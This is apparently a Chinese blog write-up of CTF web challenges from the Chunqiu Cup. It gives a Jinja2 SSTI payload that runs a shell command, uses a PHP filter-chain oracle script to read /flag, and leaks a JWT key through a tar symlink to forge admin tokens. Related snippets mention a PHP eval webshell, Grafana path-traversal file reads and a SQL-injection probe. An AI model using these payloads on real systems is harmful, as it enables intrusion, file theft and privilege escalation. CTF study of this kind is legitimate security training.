春秋杯-WEB

最新推荐文章于 2025-05-27 18:30:31 发布
最新推荐文章于 2025-05-27 18:30:31 发布
阅读量689 收藏 1
点赞数 18
分类专栏: CTF 文章标签: web安全 学习 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2301_80148821/article/details/145213301
版权

SSTI

可以看到主页那里有个登录测试之后为ssti

{{4*4}}

fenjing梭哈即可得到payload

{{((g.pop.__globals__.__builtins__.__import__('os')).popen('cat flag')).read()}}

file_copy

看到题目名字为file_copy,

当输入路径时会返回目标文件的大小,
![[Pasted image 20250117160619.png]]

通过返回包,可以看到PHP版本为8.1.31

从而找到DownUnder CTF 2022 的题目

https://www.synacktiv.com/publications/php-filter-chains-file-read-from-error-based-oracle#/

通过github脚本进行读取flag
https://github.com/synacktiv/php_filter_chains_oracle_exploit/tree/main?tab=readme-ov-file#/

python3 filters_chain_oracle_exploit.py --target http://eci-2ze4o9fodim6wmt5gbgp.cloudeci1.ichunqiu.com/ --file '/flag' --parameter path

运行得到flag

Gotar

先随便创建一个账号,然后登录。

创建一个软链接

ln -s ../../../.env links

然后将文件夹解压

tar -cf link.tar links

上传

通过代码审计可以得出链接位置

const (  
    uploadDir    = "./assets/uploads"  
    extractedDir = "./assets/extracted"  
)

一个为上传位置,另一个为解压位置

拼接得到软链接的路径

assets/extracted/2/links

得到key

然后进行jwt伪造

id改为1admin改成true。

得到flag

![[Pasted image 20250117153440.png]]

i春秋Web-Upload(第一届“百度”信息安全攻防总决赛 线上选拔赛)
Sea_Sand息禅
05-15 2270
查看源码: 告诉我们要上传一个ichunqiu的参数,但是貌似并没有找所谓的find,bp抓包看到响应中有flag的响应头: 但是解码之后上传得到的还是没上传一样的情况,响应头中的flag的内容改变了,网页也告诉我们be a fast man,所以就要写脚本了: import requests import base64 url = 'http://dc587a4fbff7497...
CTF-(i春秋 春秋欢乐 web hello world)
weixin_44089266的博客
04-11 2881
题目传送门challge 打开网站发现只显示了Hello word,打开开发者工具,network模块,发现有一个404 考虑是否有flag.js文件,输入查询后,发现 由于代码过长,考虑换种思路,经查阅,此种可能git源码泄露,一般会有 ./git/config文件,尝试访问,确实存在. 然后在kali上安装Git_Extract工具,用来下载该站源码。安装Git_Extract过程如下 g...
[DownUnderCTF 2022] crypto部分复现
weixin_52640415的博客
09-29 1282
DownUnderCTF 2022 crypto
[*CTF2022]web题目复现及wp
cosmoslin的博客
04-21 2520
WEB oh-my-grafana 搜一下相关漏洞,CVE-2021-43798 尝试读取文件 /public/plugins/alertlist/../../../../../../../../var/lib/grafana/grafana.db /public/plugins/alertlist/../../../../../../../../etc/grafana/grafana.ini # disable creation of admin user on first start of graf
2022春秋-春季赛 勇者山峰 writeup(misc全部+web签到)
ShenZ的博客
05-08 3247
2022春秋-春季赛 勇者山峰 writeup(misc全部+web签到) 1 Capture Radiate Chart 1.rar提取 查看图片,发现每个IDAT块的crc值最后两位 2.pdf分析 对pdf的结构分析,其中有一个78 9C开头的stream数据段,应该是里面有一张图片,所以对pdf进行strings 根据上面这段对象内容属性 1) png文件头 2) IDAT段 way2 2 RecoverMe 3 PINTU 4 tiger 5 被带走的机密文件 6 签到 7 Mercy-code
2024-春秋冬季赛
2301_80185313的博客
01-20 997
2024-春秋冬季赛
春秋2021-勇者山峰 helloshark
weixin_51804748的博客
11-28 608
本题附件打开是一个bmp图片 尝试用010查看该文件,搜索PK文本 发现文件末尾隐藏了一个压缩包 将后缀名改为zip后打开压缩包,发现有两个文件,但是解压需要密码,其中有提示说密码在图片中。 尝试各种工具来解析这个图片,最后可以用zsteg来得到压缩包密码 zsteg -a 文件名 用密码解压文件,用wireshark打开流量包 追踪tcp流得到疑似flag的字符串文本 写脚本跑出结果 import base64 flag='' for line in open("ws.txt"): .
i春秋ctf---2017广东省强网---web---writeup
gclome的博客
11-14 658
broken 打开是这样的: 点击 file ,出现jsfuck代码, Jsfuck代码的执行方法: ①复制 ②打开firefox浏览器 ③按下F12 ④选择上方的控制台 ⑤在下方粘贴是jsfuck代码 ⑥按下回车即可运行 把jsfuck代码放到控制器里运行,按照代码表进行审计,发现有[]没有闭合,把最后的()删掉,加上 ] ,解析出 Array[…],点击打开即可得到flag。 who ...
i春秋CTF-WEB题解(二)
weixin_42271850的博客
07-08 1284
简述         还是和之前一样,每做三题写一个题解记录一下。 一、SQL         题目给的提示是:题目内容提示这是一道SQL注入的题目。打开网页查看源代码能看到有一些提示: <!--SELECT * FROM info WHERE id=1--><br />flag{在数据库中}<br />&
CTF-2020网鼎-玄武组-web-js_on知识回顾
山下南徒的博客
07-10 1122
CTF-2020网鼎-玄武组-web-js_on知识回顾 思路:弱口令登录获得jwt_key,解开jwt,user参数有盲注,修改jwt并组装进行注入,获取flag。 涉及知识: MySQL注入 JWT安全基础 Python的requests库 Python的PyJWT库 按时间盲注写的脚本如下: #!/usr/bin/python python3 #-*-coding:utf-8-*- #CTF_2020网鼎_玄武组_Web题_js_on import requests,jwt,time ur
i春秋-web-爆破-1
Sea_Sand息禅
11-12 782
题目内容:flag就在某六位变量中。 题目 include "flag.php"; $a = @$_REQUEST['hello']; if(!preg_match('/^\w*$/',$a )){//正则表达式^匹配一行的开头,$表示结束。\w表示匹配包括下划线的任何单词字符,等价于'[A-Za-z0-9_]'。*号:匹配前面的子表达式零次或多次。 die('ERROR'); } eva...
2025春秋部分题目解题思路.docx
01-27
2025春秋部分题目解题思路CTF比赛题目合集,包含以下12道题 1. See anything in these pics? (第一天) 2. 压力大,写个脚本吧 (第一天) 3. 简单算术 (第一天) 4. easy_flask (第一天) 5. 你是小哈斯? (第一天) 6....
“百度”CTF比赛 九月场--web Upload
hanjinrui15的博客
12-30 739
“百度”CTF比赛 九月场--web Upload基础知识1、什么是一句话木马?2、一句话木马的简要原理3、html渲染过程解析渲染该过程主要分为以下步骤:解决方案:4、PHP中substr()函数解题思路1、代码分析2、求解题目总结 基础知识 1、什么是一句话木马? 最简单的理解就是,一句话木马上传到网站后台,然后我们可以通过提交参数等的方式去获取shell,比如拿菜刀或者蚁剑等工具。比如下面这段php一句话木马: <?php @eval($_POST['key']) ?> 【基本原理
2025网络安全趋势报告 内容摘要
ruanjiananquan99的博客
05-22 1183
2025 年网络安全在技术、法规、行业等多个维度呈现新趋势。技术上,人工智能、隐私保护技术、区块链、量子安全技术等取得进展;法规方面,数据安全法规进一步细化;行业应用中,物联网、工业控制系统安全升级,供应链安全受重视,自主可控趋势凸显,网络安全运维走向自动化与智能化。
Web安全测试-文件上传绕过-DVWA
最新发布
lza20001103的博客
05-27 63
Web安全测试-文件上传绕过-DVWA
WEB安全--RCE--webshell HIDS bypass3
m0_74800552的博客
05-26 262
webshell bypass
如何保护网络免受零日漏洞攻击?
endpointcentral的博客
05-27 574
它自动化了完整的终端管理生命周期,从简单的系统配置到复杂的软件部署。IT安全是另一个主要问题,许多易受攻击和未打补丁的设备面临恶意软件和漏洞利用的风险,但没有明确的方法来了解问题的总体规模或如何应对新的威胁。借助Endpoint Central,找到了一个单一、经济高效的解决方案,可以集成服务台所需的所有功能,包括远程支持、补丁管理、资产管理和软件部署。借助Endpoint Central的统一终端管理方法,能够相对轻松地执行所有移动配置、部署和安全管理任务,为客户提供更快、响应更快的服务。
WEB安全--RCE--webshell HIDS bypass4
m0_74800552的博客
05-27 151
我们回过头来看$da->getTimestamp()>=1725329100||$n='1' ,当$da->getTimestamp()>=1725329100为假,$n='1'就会执行赋值的操作,这时$n的值就由'F'变为'1',但是当$da->getTimestamp()>=1725329100为真,那么就不会执行$n='1'的操作,$n='F'的值就不变了。此时满足时间条件,$n='F',ltrim从参数的默认值常量名中去掉前导的$n,也就是说FSYSTEM会变成SYSTEM,就能构成命令执行。
IP风险度自检,多维度守护网络安全
PIKACHUBIN的博客
05-23 1196
在“每个IP都是潜在攻击面”的时代,IP风险度为网络安全与业务合规提供了精准的量化工具。
i春秋ctf web
01-04
### i春秋CTF Web安全挑战资源 #### 关于i春秋平台及其特色 i春秋是一个提供网络安全培训和竞赛的在线教育平台,该平台不仅提供了丰富的课程学习资料还举办了多次高水平的安全赛事。其中提到的百度CTF夺旗大战是由百度安全应急响应中心与i春秋共同发起的一项活动,这项比赛具有较长的时间跨度以及较高的频率特点[^1]。 #### Web安全挑战详情 对于希望参与Web方向CTF练习的人来说,在i春秋上可以找到许多优质的实践机会。通过访问[i春秋官网](http://www.ichunqiu.com),能够获取到有关往届比赛中涉及的具体题目解析及线下总决赛期间所使用的试题重现等内容,这对于提升个人技能水平十分有益处[^2]。 此外,除了官方提供的历年真题外,还可以关注一些第三方站点如[ADWorld XCTF社区](https://adworld.xctf.org.cn/),尽管有时会遇到服务器维护的情况,这里同样收录了不少高质量的Web类CTF挑战项目供爱好者们交流探讨[^3]。 为了更好地准备这类基于Web的应用程序渗透测试环节,建议深入研究常见的漏洞类型(SQL注入、XSS跨站脚本攻击等),并尝试利用工具辅助分析目标系统的潜在弱点。同时也可以参考其他开源平台上分享的技术文档来补充理论知识,比如RPISEC团队整理的一系列二进制逆向工程教程就非常适合用来强化底层原理的理解[^4]。 ```python import requests def check_sql_injection(url, param): payload = "' OR '1'='1" test_url = f"{url}?{param}={payload}" response = requests.get(test_url) if "You have an error in your SQL syntax;" in response.text: print(f"[+] Potential SQL Injection found at {test_url}") else: print("[-] No obvious signs of SQL Injection") # Example usage (for educational purposes only!) check_sql_injection('http://example.com/login', 'username') ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

follycat

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值